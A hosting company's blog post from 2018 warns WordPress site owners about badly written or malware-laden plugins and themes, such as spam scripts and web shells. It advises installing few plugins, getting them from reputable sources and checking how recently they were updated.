Cloudhub Blog

The latest news and announcements about our cloud infrastructure.

The Dangers Of WordPress Plugins And Themes

  • 09/05/2018

From its humble beginnings as simple blogging software, WordPress is now estimated to power more than 30% of the top 10 million websites in the world. One of the factors that has increased WordPress�s popularity is the ease with which plugins and themes can be created to extend it and provide more functionality than the default setup.

At the time of writing the WordPress website lists more than 56,000 plugins alongside thousands of themes. Plugins and themes are available on both the official WordPress website, and also the many other sites across the internet. Some themes and plugins are free, while others may require payment to use. Everyone likes something for nothing, so free theme and plugin sites are very popular.

So what problems can you face when adding plugins and themes to your WordPress site?

Well, the first issue is that as it�s easy for almost anyone to write a plugin or theme for WordPress. Therefore, not every plugin has been built by a professional web developer: some are made by amateurs with varying degrees of expertise and experience. This can lead to some plugins being badly written, slow and buggy. Some could make a website slow to a crawl, others may be so poorly developed that they slow your whole VPS to a crawl while they are carrying out their required task. Another issue with a badly written plugins is that they can have bugs that make it trivial for an attacker to compromise your website, and then possibly your whole VPS.

However, poor plugins aren�t the only threat. Due to the fact that anyone can write plugins and themes, some hackers also make their own plugins and themes or modify existing ones. Rather than having bugs that could be exploited, the plugins and themes that the hackers modify come with malware included in them that the hackers can use. This malware ranges from simple scripts to send spam on the hacker�s behalf through to full custom shells that allow the hacker to control the server through a web page as if they had SSH access to the server. Unless you know what you are looking for, a legitimate theme or plugin can look much the same as a pre-hacked theme or plugin which can make if difficult to detect before the malware is being used to abuse the server.

How to detect a bad WordPress plugin or theme:

Generally the first you will know that a bad WordPress plugin or theme is in use on your server will be once the detrimental effects are felt, such as the server overloading, or receiving abusive complaints about spamming or worse from your server.

So what can you do about it?

It�s easy to advise that you never use any plugins or themes on your WordPress site, but that becomes cumbersome when you are actually trying to set up a fully functioning site. So the best thing to do is be selective about the plugins that you use.

First, only install the plugins and themes that you really need, and uninstall any that you don�t.
Second, make sure that you only get plugins and themes from respectable websites. If you aren�t sure of the standard of a site, then do some research and see what the community says.
Third, check for the creator of the plugin and when it was last updated, as good creators will gain a reputation in the community, and a regularly updated plugin or theme shows a creator that looks to fix flaws as they are found.